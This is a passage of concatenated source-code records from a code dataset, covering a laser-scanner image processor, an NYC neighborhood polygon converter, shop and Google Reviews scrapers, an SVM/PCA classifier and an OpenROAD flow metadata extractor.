thresh)\n laser_positions - jest to lista punktów w płaszczyźnie kamery (punkty są przechowywane jako np.array [x, y, z]),\n gdzie x, y odpowiada wykrytym punktom lasera na zdjęciu, przesunięte względem punkty\n centralnym kamery.\n thresh - sprogowane zdjęcie\n \"\"\"\n _, thresh = cv2.threshold(self.photo, self.configuration[\"THRESHOLD\"], 255, cv2.THRESH_BINARY)\n thresh[:, :self.configuration[\"MIN_X\"] + self.configuration[\"OPTICAL_CENTER_X\"]] = 0\n thresh[:, self.configuration[\"MAX_X\"] + self.configuration[\"OPTICAL_CENTER_X\"]:] = 0\n laser_positions = self._count_laser_pos(thresh)\n self.photo = cv2.cvtColor(self.photo, cv2.COLOR_GRAY2BGR)\n laser_positions = laser_positions - np.array([\n np.full(laser_positions.shape[0], self.configuration[\"OPTICAL_CENTER_X\"]),\n np.full(laser_positions.shape[0], self.configuration[\"OPTICAL_CENTER_Y\"]),\n np.full(laser_positions.shape[0], 0)\n ]).T\n return laser_positions, thresh\n\n def postprocess_photo(self, laser_positions, on_scans):\n \"\"\"\n Funkcja dodająca do zdjęcia wykryte punkty. Punkty które znajdują się na skanie, są koloru zielonego,\n nie wykryte na czerwono.\n :param laser_positions: lista punktów w płaszczyźnie kamery, przesunięte względem punkty centralnym kamery.\n :param on_scans: lista zmiennych boolowskich opowiadająca każdemu punktow lasera, jeżeli True to punkt znajduje\n się na skanie.\n \"\"\"\n for position, on_scan in zip(laser_positions, on_scans):\n pos = (int(round(position[0] - self.configuration[\"OPTICAL_CENTER_X\"])),\n int(round(position[1] - self.configuration[\"OPTICAL_CENTER_Y\"])))\n if on_scan:\n self.photo[pos[0]][pos[1]] = np.array([0, 255, 0])\n else:\n self.photo[pos[0]][pos[1]] = np.array([0, 0, 255])\n\n def save_photo(self, angle):\n \"\"\"\n Funckja zapisująca zdjęcie w folderze projektu.\n :param angle: kąt obrotu względem środka płytki z przedmiotem\n :return: string ze ścieżka do danego pliku lub None jeżeli zdjęcie nie zostało wykonane\n \"\"\"\n if self.photo is not None:\n file_name = self._generate_file_name(angle)\n photo_path = os.path.join(self._path, self._project_name, file_name)\n cv2.imwrite(photo_path, self.photo)\n return photo_path\n return None\n\n @staticmethod\n def _find_longest_segment(lit_points_in_the_line):\n \"\"\"\n Funkcja znadująca najdłuższy oświetlony segment w danej linii\n :param lit_points_in_the_line: lista oświetlonych punktów(jako wartości x)\n :return: Zwraca maksymalny segment jako krotkę (ostatni element segmentu, długość segmentu)\n \"\"\"\n length_of_segment = 0\n max_len = 0\n last_x = None\n max_segment = None\n\n for x in lit_points_in_the_line:\n if last_x and x != last_x + 1:\n if length_of_segment > max_len:\n max_len = length_of_segment\n max_segment = (last_x, length_of_segment)\n length_of_segment = 0\n length_of_segment += 1\n last_x = x\n if length_of_segment > max_len:\n max_segment = (last_x, length_of_segment)\n\n return max_segment\n\n @staticmethod\n def _count_average(frame_line, range_of_points):\n \"\"\"\n Funckja licząca średnią ważoną segmentu, dzięki czemu zwraca punkt centralny laser (x).\n :param frame_line: linia obraz\n :param range_of_points: zakres segmentu jako krotka (ind. pierwszego elementu, ind. ostatniego elementu + 1)\n :return: Punkt centralny laser\n \"\"\"\n sum_u = 0\n sum_d = 0\n for i in range_of_points:\n sum_u += frame_line[i] * i\n sum_d += frame_line[i]\n return sum_u / sum_d\n\n def _count_laser_pos(self, thresh): # return list of laser position, every position is a tuple (y, x)\n \"\"\"\n Funkcja oblicza punkt centralny lasera każdej linii na podstawie której w\n :param thresh: sprogowane zdjęcie\n :return: lista punktów lasera\n \"\"\"\n non_zeros = np.nonzero(thresh)\n laser_pos = []\n\n x_indices = []\n last_y_index = -1\n arr_len = non_zeros[1].shape[0]\n for i in range(arr_len):\n y = non_zeros[0][i]\n x = non_zeros[1][i]\n if last_y_index != y or arr_len == i:\n if last_y_index != -1:\n longest_segment = self._find_longest_segment(x_indices)\n longest_segment_range = (longest_segment[0] - longest_segment[1] + 1, longest_segment[0] + 1)\n avg = self._count_average(self.photo[last_y_index], longest_segment_range)\n laser_pos.append((avg, last_y_index, 1))\n x_indices = []\n last_y_index = y\n x_indices.append(x)\n return np.array(laser_pos)\n\n def close_camera(self):\n \"\"\"Zamknięcie połączenia z kamerą na koniec proojektu. \"\"\"\n self._camera.end()\n","sub_path":"Apka/python_files/image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":7774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"108699297","text":"#!/usr/bin/python\n\nimport boroughs\nimport json\nimport re\nimport shape_utils\nimport sys\nimport xml.etree.ElementTree as ET\n\ndef ReadKmlFile(path):\n neighborhood_to_coords = {}\n xmlstring = file(path).read()\n xmlstring = re.sub(r\" xmlns='[^']+'\", '', xmlstring, count=1)\n root = ET.fromstring(xmlstring)\n\n for node in root.findall('.//Placemark'):\n neighborhood = node.findtext('.//name')\n coords = node.findtext('.//coordinates')\n xyzs = [[float(x) for x in y.split(',')] for y in coords.strip().split(' ')]\n lon_lats = [(xyz[0], xyz[1]) for xyz in xyzs]\n center_lon, center_lat, _ = shape_utils.CenterOfMass(lon_lats)\n boro = boroughs.PointToBorough(center_lat, center_lon)\n # assert boro\n # Distinguish \"Chelsea, Manhattan\" from \"Chelsea, Staten Island\".\n if boro:\n neighborhood = '%s, %s' % (neighborhood, boro)\n neighborhood_to_coords[neighborhood] = lon_lats\n\n return neighborhood_to_coords\n\n\nokc = ReadKmlFile('nyc-neighborhoods.xml')\ncustom = ReadKmlFile('extra-neighborhoods.kml')\n\ndel okc[\"Randall's Island, Manhattan\"]\ndel okc[\"Roosevelt Island, Manhattan\"]\n\noverlap = set(okc.keys()).intersection(set(custom.keys()))\nassert len(overlap) == 0, ', '.join(overlap)\n\nneighborhood_to_coords = {}\nneighborhood_to_coords.update(okc)\nneighborhood_to_coords.update(custom)\n\nsys.stderr.write(\n 'Loaded %d neighborhood polygons.\\n' % len(neighborhood_to_coords))\n\njson.dump(neighborhood_to_coords, file('neighborhood-polygons.json', 'w'))\n\n","sub_path":"nyc/create-neighborhood-json.py","file_name":"create-neighborhood-json.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"255222138","text":"from __selector import __ ,_post\nimport json\n\n\n\n\n\ndef home():\n\turl='https://myshopprime.com/abhijit.murmu/shop/all'\n\ta=__(url,'.tile-container > .nocta') \n\tmainObj = {}\n\tfor i in a:\n\t\tlis = __('','.t-box',i)\n\t\tfor ass in lis:\n\t\t\timg = __('','.img-responsive',ass)\n\t\t\tshort = __('','.t-info p',ass)\n\t\t\tlink = __('','.t-info > a',ass)\n\t\t\tdp = __('','.discounted-price',ass)\n\t\t\tprint(img,short,link,dp)\n\t\t\tprint('\\n\\n')\n\t\t\tif len(img) == 1 and len(short) == 1:\n\t\t\t\timageLink = img[0]['src']\n\t\t\t\tshortText = short[0].text\n\t\t\t\tarticleHash = hash(img[0]['src'])\n\t\t\t\tlinkText = link[0]['href'] \n\t\t\t\tprice= dp[0].text\n\t\t\t\tmainObj[articleHash] = {\n\t\t\t\t\t\"imageLink\":imageLink,\n\t\t\t\t\t\"shortText\":shortText,\n\t\t\t\t\t\"linkText\":linkText,\n\t\t\t\t\t\"price\":price\n\t\t\t\t}\n\t\t\t\t \n\t\t\t\tprint('\\n')\n\t# print(mainObj)\n\n\tf=open('output/output-data.json', \"w+\")\n\tf.write(json.dumps(mainObj))\n\tf.close() \nhome()\n\n\n\t\nprint('finish')\n","sub_path":"myshopprime.py","file_name":"myshopprime.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"599934448","text":"import ast, json, string, operator, re, os, time, pickle, requests\nimport argparse as ap\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nfrom scrape_comments import read_user\nfrom pathlib import Path\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport numpy as np\n\n\nCLICK_PAUSE_TIME = .5\n\ndef scrape_googlereviews_data(search_query, max_count):\n max_count = max_count * 2\n\n #Open browser in incognito\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--incognito\")\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-gpu')\n driver = webdriver.Chrome(options=chrome_options)\n driver.get(\"http://www.google.com\")\n\n #First google search\n elem = driver.find_element_by_name(\"q\")\n elem.clear()\n search_string = \"Google Reviews \" + search_query.replace(\"-\",\" \")\n elem.send_keys(search_string)\n elem.send_keys(Keys.RETURN)\n\n #Click on reviews\n reviewbutton = driver.find_element_by_xpath(\"//span[@jsl='$t t-h6pVaOIWfNg;$x 0;']\")\n reviewbutton.get_attribute('data-ved')\n reviewbutton.click()\n time.sleep(CLICK_PAUSE_TIME*6)\n\n #Scroll down review window to load all reviews\n # Finding a focusable element so that we can scroll\n try:\n focusable = driver.find_element_by_xpath(\"//button[@jsaction='r.GnCZFN8m9d0']\")\n except:\n print(\"Too Fast\")\n time.sleep(CLICK_PAUSE_TIME*8)\n focusable = driver.find_element_by_xpath(\"//button[@jsaction='r.GnCZFN8m9d0']\")\n\n scrolls = int(np.ceil(max_count/10)+1)\n for i in range(0,scrolls): #Collects the first 200 (10 per loop)\n focusable.send_keys(Keys.END)\n time.sleep(CLICK_PAUSE_TIME)\n\n #Expand all of the reviews\n #Note that the last several reviews may not be expanded\n #Because expanding the reviews actually loads a few more reviews \n expand_buttons = driver.find_elements_by_xpath(\"//a[@class='fl review-more-link']\")\n for button in expand_buttons:\n try:\n button.click()\n except:\n print(\"button already printed?\")\n\n #Extract all review elements\n reviews = driver.find_elements_by_xpath(\"//span[@jsl='$t t-uvHqeLvCkgA;$x 0;']\")\n\n #Extract text from reviews\n output = []\n for review in reviews:\n if(review.text != ''):\n output.append(review.text)\n\n #Close the driver\n driver.close()\n\n #Return our texts\n print(len(output)) \n return output\n\ndef scrape_google_description(search_query):\n #Open browser in incognito\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--incognito\")\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-gpu')\n driver = webdriver.Chrome(options=chrome_options)\n driver.get(\"http://www.google.com\")\n\n #First google search\n elem = driver.find_element_by_name(\"q\")\n elem.clear()\n search_string = search_query.replace(\"-\",\" \")\n elem.send_keys(search_string)\n elem.send_keys(Keys.RETURN)\n\n try:\n description_span = driver.find_element_by_xpath(\"//span[@class='Yy0acb']\")\n print(description_span)\n description = description_span.text\n print(description)\n except: \n description = ''\n\n #Close the driver\n driver.close()\n\n #Return our texts\n return description\n\ndef scrape_google_hours_spent(search_query):\n #Open browser in incognito\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--incognito\")\n # chrome_options.add_argument('--headless')\n # chrome_options.add_argument('--no-sandbox')\n # chrome_options.add_argument('--disable-gpu')\n driver = webdriver.Chrome(options=chrome_options)\n driver.get(\"http://www.google.com\")\n\n #First google search\n elem = driver.find_element_by_name(\"q\")\n elem.clear()\n search_string = search_query.replace(\"-\",\" \")\n elem.send_keys(search_string)\n elem.send_keys(Keys.RETURN)\n\n hours_div = driver.find_element_by_xpath(\"//div[@class='UYKlhc']\")\n print(hours_div)\n hours = hours_div.find_element_by_xpath(\".//b\").text\n print(hours)\n\n #Close the driver\n driver.close()\n\n #Return our texts\n return hours\n\nif __name__ == '__main__':\n scrape_google_description('Girl and the Goat Chicago')\n # parser = ap.ArgumentParser()\n # parser.add_argument('-s', '--search_query', help='Search Query', default='girl-and-the-goat-chicago')\n # parser.add_argument('-n', '--n', help='Max Count', default='200')\n\n # args = vars(parser.parse_args())\n # search_query = args['search_query']\n # n = int(args['n'])\n # scrape_googlereviews_data(search_query, n)\n ","sub_path":"scrape_reviews_googlereviews.py","file_name":"scrape_reviews_googlereviews.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207525377","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nMulti-Class SVM while using PCA to reduce dimensionality\r\n\"\"\"\r\n\r\n# Imports\r\nimport numpy as np\r\nimport scipy.io as sio\r\nfrom sklearn import decomposition\r\nfrom sklearn.svm import SVC\r\nfrom sklearn import preprocessing\r\nfrom sklearn.pipeline import FeatureUnion\r\nfrom sklearn import cross_validation\r\nfrom sklearn.feature_selection import SelectKBest, f_classif, SelectPercentile\r\nfrom evolutionary_search import EvolutionaryAlgorithmSearchCV\r\n# Import the data\r\ntrainData = sio.loadmat('Train.mat')\r\ntestData = sio.loadmat('Test.mat')\r\n\r\n# Get the values of the train data\r\nXtrain = trainData.get('Xtrain')\r\nYtrain = trainData.get('Ytrain')\r\neventsTrain = trainData.get('eventsTrain')\r\nsubjectsTrain = trainData.get('subjectsTrain')\r\nx = trainData.get('x')\r\ny = trainData.get('y')\r\nz = trainData.get('z')\r\n\r\n# Get the values of the test data\r\n# Get the test data into a numpy array\r\ntestX = testData.get('Xtest')\r\neventsTest = testData.get('eventsTest')\r\nsubjectsTest = testData.get('subjectsTest')\r\ntestX = np.array( testX, np.float32)\r\n\r\n# Set up the classifier\r\n# Use PCA to reduce the dimensionality\r\ncomp = 453 # number of components\r\ncw = {}\r\ncw[1] = 1\r\ncw[0] = 1\r\ncw[3] = 1\r\npca = decomposition.PCA(n_components=comp)\r\n\r\nselection = SelectKBest(k=180)\r\nclass_stuff = SelectPercentile(f_classif, percentile = 4)\r\ncombined_features = FeatureUnion([(\"pca\", pca), (\"univ_select\", selection),(\"class_stuff\",class_stuff)])\r\n\r\n#X_features = combined_features.fit(Xtrain, Ytrain).transform(Xtrain)\r\n\r\n# Set up the classifier\r\nclf = SVC(C = 10, cache_size=200, coef0=0.0, gamma = 0.0001,\r\n degree=3, kernel='rbf', max_iter=-1, class_weight = cw,\r\n probability=True,random_state=None, shrinking=True, \r\n tol=0.0001, verbose=False)\r\n\r\nXtrain = preprocessing.StandardScaler(copy=True, with_mean=True, with_std=True).fit_transform(Xtrain)\r\n#pca.fit(Xtrain)\r\nX_pca = combined_features.fit(Xtrain, np.ravel(Ytrain)).transform(Xtrain)\r\n#X_pca = preprocessing.StandardScaler(copy=True, with_mean=True, with_std=True).fit_transform(X_pca)\r\nclf.fit( X_pca, np.ravel(Ytrain))\r\n\r\n\r\n# Run cross validation\r\nscores = cross_validation.cross_val_score(clf, X_pca, np.ravel(Ytrain), cv=10)\r\nprint(scores.mean())\r\n\r\n\r\n# Run the values on the test set\r\ntestX = testData.get('Xtest')\r\ntestY = []\r\ntestY = np.array(testY, np.float32)\r\nprob = []\r\nprob = np.array(prob, np.float32)\r\n\r\n# Use PCA on the test set\r\ntestX = preprocessing.StandardScaler(copy=True, with_mean=True, with_std=True).fit_transform(testX)\r\ntestNew = combined_features.transform(testX)\r\n#testNew = preprocessing.StandardScaler(copy=True, with_mean=True, with_std=True).fit_transform(testNew)\r\n# Get the class prediction\r\ntestY = clf.predict( testNew )\r\n# Get the probabilities\r\nprob = clf.predict_proba( testNew )\r\n\r\n# convert to labels\r\n\r\nnew = np.zeros((1001,3))\r\n\r\nfor i in range(0, 1001):\r\n if( prob[i,0] == max(prob[i,:])):\r\n new[i,:] = [1.0000, 0.0000, 0.0000]\r\n elif( prob[i,1] == max(prob[i,:])):\r\n new[i,:] = [0.0000, 1.0000, 0.0000]\r\n else:\r\n new[i,:] = [0.0000, 0.0000, 1.0000]\r\n\r\n\r\n# Put into a csv file\r\nnp.savetxt('prediction.csv', new, delimiter=\",\")","sub_path":"Project - Visual Object Recognition/autoscikit.py","file_name":"autoscikit.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"513577555","text":"#!/usr/bin/env python2\n\n# This scripts attempts to extract relevant data from a completed flow design\n# and save it into a \"metadata.json\". It achieves this by looking for specific\n# information in specific files using regular expressions\n#-------------------------------------------------------------------------------\n\nimport argparse # argument parsing\nimport json # json parsing\nimport subprocess\nimport sys\nimport re\nimport os # filesystem manipulation\nimport datetime\nimport uuid\nimport platform\nfrom collections import OrderedDict\n\n\n# Parse and validate arguments\n# ==============================================================================\nparser = argparse.ArgumentParser(\n description='Generates metadata from OpenROAD flow')\nparser.add_argument('--flowPath', '-f', required=True,\n help='Path to the flow directory')\nparser.add_argument('--design', '-d', required=True,\n help='Path to the flow directory')\nparser.add_argument('--platform', '-p', required=True,\n help='Path to the flow directory')\nparser.add_argument('--comment', '-c', required=False, default=\"\",\n help='Additional comments to embed')\nparser.add_argument('--output', '-o', required=False, default=\"metadata.json\",\n help='Output file')\nargs = parser.parse_args()\n\nif not os.path.isdir(args.flowPath):\n print(\"Error: flowPath does not exist\")\n print(\"Path: \" + args.flowPath)\n sys.exit(1)\n\nlogPath = os.path.join(args.flowPath, \"logs\", args.platform, args.design)\nrptPath = os.path.join(args.flowPath, \"reports\", args.platform, args.design)\n\n# Functions\n# ==============================================================================\n# Main function to do specific extraction of patterns from a file\n\n# This function will look for a regular expression \"pattern\" in a \"file\", and\n# set the key, \"jsonTag\", to the value found. The specific \"occurrence\" selects\n# which occurrence it uses. If pattern not found, it will print an error and set\n# the value to N/A. If a \"defaultNotFound\" is set, it will use that instead.\n# If occurrence is set to -2, it will return the count of the pattern.\n# t indicates the type that should be written to the JSON file (default: string)\ndef extractTagFromFile(jsonTag, pattern, file, occurrence=-1, defaultNotFound=\"N/A\", t=str):\n if jsonTag in jsonFile:\n print(\"[WARN] Overwriting Tag\", jsonTag)\n\n # Open file\n try:\n searchFilePath = os.path.join(args.flowPath, file)\n with open(searchFilePath) as f:\n content = f.read()\n\n m = re.findall(pattern, content, re.M)\n\n if m:\n if occurrence == -2:\n # Return the count\n jsonFile[jsonTag] = len(m)\n else:\n # Note: This gets the specified occurrence\n jsonFile[jsonTag] = (t)(m[occurrence].strip())\n else:\n # Only print a warning if the defaultNotFound is not set\n if defaultNotFound == \"N/A\":\n print(\"[WARN] Tag\", jsonTag, \"not found in\", searchFilePath)\n jsonFile[jsonTag] = defaultNotFound\n except IOError:\n print(\"[WARN] Failed to open file:\", searchFilePath)\n jsonFile[jsonTag] = \"ERR\"\n\n\ndef extractGnuTime(prefix, file):\n extractTagFromFile(prefix + \"__runtime__total\",\n \"^(\\S+)elapsed \\S+CPU \\S+memKB\",\n file)\n extractTagFromFile(prefix + \"__cpu__total\",\n \"^\\S+elapsed (\\S+)CPU \\S+memKB\",\n file)\n extractTagFromFile(prefix + \"__mem__peak\",\n \"^\\S+elapsed \\S+CPU (\\S+)memKB\",\n file, t=int)\n\n\n# Main\n# ==============================================================================\n\nnow = datetime.datetime.now()\njsonFile = OrderedDict()\n\njsonFile[\"run__flow__generate_date\"] = now.strftime(\"%Y-%m-%d %H:%M\")\ncmdOutput = subprocess.check_output(['openroad', '-version'])\ncmdFields = cmdOutput.split()\njsonFile[\"run__flow__openroad_version\"] = cmdFields[0]\nif (len(cmdFields) > 1):\n jsonFile[\"run__flow__openroad_commit\"] = cmdFields[1]\nelse:\n jsonFile[\"run__flow__openroad_commit\"] = \"N/A\"\njsonFile[\"run__flow__uuid\"] = str(uuid.uuid4())\njsonFile[\"run__flow__design\"] = args.design\njsonFile[\"run__flow__platform\"] = args.platform\njsonFile[\"comment\"] = args.comment\njsonFile[\"run__flow__hostname\"] = platform.node()\njsonFile[\"comment\"] = args.comment\n\n\n# Synthesis\n# ==============================================================================\n\n# yosys\nextractTagFromFile(\"run__synth__yosys_version\",\n \"^Yosys (.*)\",\n logPath+\"/1_1_yosys.log\")\nextractTagFromFile(\"synth__inst__num__total\",\n \"Number of cells: +(\\S+)\",\n rptPath+\"/synth_stat.txt\", t=int)\nextractTagFromFile(\"synth__inst__stdcell__area__total\",\n \"Chip area for module.*: +(\\S+)\",\n rptPath+\"/synth_stat.txt\", t=float)\nextractTagFromFile(\"run__synth__yosys_runtime__total\",\n \"CPU: user (\\S+)\",\n logPath+\"/1_1_yosys.log\")\nextractTagFromFile(\"run__synth__yosys_mem\",\n \"CPU: user.*MEM: (\\S+ \\S+)\",\n logPath+\"/1_1_yosys.log\")\nextractTagFromFile(\"run__synth__yosys_warnings\",\n \"Warnings: \\d+ unique messages, (\\d+) total\",\n logPath+\"/1_1_yosys.log\", t=int)\n\nextractGnuTime(\"run__synth\",logPath+\"/1_1_yosys.log\")\n\n# Floorplan\n# ==============================================================================\nextractTagFromFile(\"floorplan__slack__average__totneg\",\n \"^tns (\\S+)\",\n rptPath+\"/2_init.rpt\", t=float)\nextractTagFromFile(\"floorplan__slack__average__worst\",\n \"^wns (\\S+)\",\n rptPath+\"/2_init.rpt\", t=float)\nextractTagFromFile(\"floorplan__std__area__total\",\n \"^Design area (\\S+) u\\^2\",\n rptPath+\"/2_init.rpt\", t=int)\nextractTagFromFile(\"floorplan__util\",\n \"^Design area.* (\\S+%) utilization\",\n rptPath+\"/2_init.rpt\")\nextractTagFromFile(\"run__floorplan__warnings\",\n \"(?i)warning\",\n logPath+\"/2_1_floorplan.log\", -2, 0)\nextractGnuTime(\"floorplan\",logPath+\"/2_1_floorplan.log\")\n\nextractTagFromFile(\"floorplan__io__count__total\",\n \"Num of I/O +(\\d+)\",\n logPath+\"/2_2_floorplan_io.log\", t=int)\nextractGnuTime(\"run__floorplan_io\",logPath+\"/2_2_floorplan_io.log\")\n\n\nextractGnuTime(\"run__floorplan_tdms\",logPath+\"/2_3_tdms_place.log\")\n\n\nextractTagFromFile(\"macroplace__inst__macro__count__total\",\n \"Extracted # Macros: (\\S+)\",\n logPath+\"/2_4_mplace.log\", -1, 0, t=int)\nextractTagFromFile(\"macroplace__solutions\",\n \"Total Extracted Solution: (\\S+)\",\n logPath+\"/2_4_mplace.log\", -1, 0, t=int)\nextractGnuTime(\"run__mplace\",logPath+\"/2_4_mplace.log\")\n\nextractGnuTime(\"run__tapcell\",logPath+\"/2_5_tapcell.log\")\n\nextractGnuTime(\"run__pdn\",logPath+\"/2_6_pdn.log\")\n\n\n# Place\n# ==============================================================================\n\n# global place\nextractTagFromFile(\"globalplace__wirelength__est\",\n \"^HP wire length: (\\S+)\",\n logPath+\"/3_1_place_gp.log\")\nextractTagFromFile(\"globalplace__slack__average__worst\",\n \"^Worst slack: (\\S+)\",\n logPath+\"/3_1_place_gp.log\")\nextractTagFromFile(\"globalplace__slack__average__totneg\",\n \"^Total negative slack: (\\S+)\",\n logPath+\"/3_1_place_gp.log\")\nextractTagFromFile(\"globalplace__util\",\n \"Util\\(%\\) = (\\S+)\",\n logPath+\"/3_1_place_gp.log\")\nextractGnuTime(\"run__globalplace\",logPath+\"/3_1_place_gp.log\")\n\n\n# Resizer\nextractTagFromFile(\"resizer__pre__slack__average__totneg\",\n \"^tns (\\S+)\",\n rptPath+\"/3_pre_resize.rpt\", t=float)\nextractTagFromFile(\"resizer__pre__slack__average_worst\",\n \"^wns (\\S+)\",\n rptPath+\"/3_pre_resize.rpt\", t=float)\nextractTagFromFile(\"resizer__pre__core__area__area\",\n \"^Design area (\\S+ \\S+)\",\n rptPath+\"/3_pre_resize.rpt\")\nextractTagFromFile(\"resizer__pre__util\",\n \"^Design area.* (\\S+%) utilization\",\n rptPath+\"/3_pre_resize.rpt\")\nextractTagFromFile(\"resizer__ibuf_count\",\n \"Inserted (\\d+) input buffers\",\n logPath+\"/3_2_resizer.log\", t=int)\nextractTagFromFile(\"resizer__obuf_count\",\n \"Inserted (\\d+) output buffers\",\n logPath+\"/3_2_resizer.log\", t=int)\nextractTagFromFile(\"resizer__resize_count\",\n \"Resized (\\d+) instances\",\n logPath+\"/3_2_resizer.log\", t=int)\nextractTagFromFile(\"resizer__hbuf_count\",\n \"Inserted (\\d+) hold buffers\",\n logPath+\"/3_2_resizer.log\", t=int)\nextractTagFromFile(\"resizer__maxcap_viols\",\n \"Found (\\d+) max capacitance violations\",\n logPath+\"/3_2_resizer.log\", -1, 0, t=int)\nextractTagFromFile(\"resizer__maxslew_viols\",\n \"Found (\\d+) max slew violations\",\n logPath+\"/3_2_resizer.log\", -1, 0, t=int)\nextractTagFromFile(\"resizer__maxfanout_viols\",\n \"Found (\\d+) max fanout violations\",\n logPath+\"/3_2_resizer.log\", -1, 0, t=int)\nextractTagFromFile(\"resizer__maxfanout_bufs\",\n \"Inserted (\\d+) buffers\",\n logPath+\"/3_2_resizer.log\", -1, 0, t=int)\n#TODO Tie hi tie low\n# extractTagFromFile(\"resizer_maxfanout_bufs_tielo\",\n# \"Inserted (\\d+) tie \\S+ instances for \\d+ nets\",\n# logPath+\"/3_2_resizer.log\", 0, \"0\")\n# extractTagFromFile(\"resizer_maxfanout_bufs_tielo\",\n# \"Inserted (\\d+) tie \\S+ instances for \\d+ nets\",\n# logPath+\"/3_2_resizer.log\", 1, \"0\")\nextractTagFromFile(\"resizer__post__slack__average__totneg\",\n \"^tns (\\S+)\",\n rptPath+\"/3_post_resize.rpt\", t=float)\nextractTagFromFile(\"resizer__post__slack__average__worst\",\n \"^wns (\\S+)\",\n rptPath+\"/3_post_resize.rpt\", t=float)\nextractTagFromFile(\"resizer__post__core__area__total\",\n \"^Design area (\\S+ \\S+)\",\n rptPath+\"/3_post_resize.rpt\")\nextractTagFromFile(\"resizer__post__util\",\n \"^Design area.* (\\S+%) utilization\",\n rptPath+\"/3_post_resize.rpt\")\nextractGnuTime(\"run__resizer\",logPath+\"/3_2_resizer.log\")\n\n\n# Detail place\nextractTagFromFile(\"detailedplace__inst__core__area__total\",\n \"design area +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__inst__num__total\",\n \"total instances +(\\d+)\",\n logPath+\"/3_3_opendp.log\", t=int)\nextractTagFromFile(\"detailedplace__util\",\n \"utilization +(\\d+)\",\n logPath+\"/3_3_opendp.log\", t=int)\nextractTagFromFile(\"detailedplace__total_displacement\",\n \"total displacement +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__average_displacement\",\n \"average displacement +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__max_displacement\",\n \"max displacement +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__wirelength__est__original\",\n \"original HPWL +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__wirelength__est__legalized\",\n \"legalized HPWL +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__wirelength__est__delta\",\n \"delta HPWL +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=int)\nextractGnuTime(\"run__dp\",logPath+\"/3_3_opendp.log\")\n\n# CTS\n# ==============================================================================\nextractGnuTime(\"run__cts\",logPath+\"/4_cts.log\")\n\n# Route\n# ==============================================================================\n\nextractGnuTime(\"run__globalroute\",logPath+\"/5_1_fastroute.log\")\n\n\nextractTagFromFile(\"detailedroute__layers__num__total\",\n \"#layers: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__inst__macro__num__total\",\n \"#macros: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__num_vias\",\n \"#vias: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__trackPts\",\n \"trackPts: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__defvias__num__total\",\n \"defvias: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__components__num__total\",\n \"#components: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__terminals__num__total\",\n \"#terminals: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__nets__num__total\",\n \"nets: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"droute_num_unique_instances\",\n \"#unique instances = +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__unique_instances__num__total\",\n \"#scanned instances += +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__runtime\",\n \"Runtime taken \\(hrt\\): +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=float)\nextractTagFromFile(\"detailedroute__wirelength__est\",\n \"total wire length = +(\\S+) um\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__via__num__total\",\n \"total number of vias = +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__peak_mem\",\n \"peak = (\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=float)\n\nextractTagFromFile(\"detailedroute__warnings\",\n \"(?i)warning:\",\n logPath+\"/5_2_TritonRoute.log\", -2, 0)\nextractTagFromFile(\"detailedroute__errors\",\n \"(?i)error:\",\n logPath+\"/5_2_TritonRoute.log\", -2, 0)\nextractTagFromFile(\"detailedroute__drc__num__total\",\n \"(?i)violation\",\n rptPath+\"/5_route_drc.rpt\", -2, 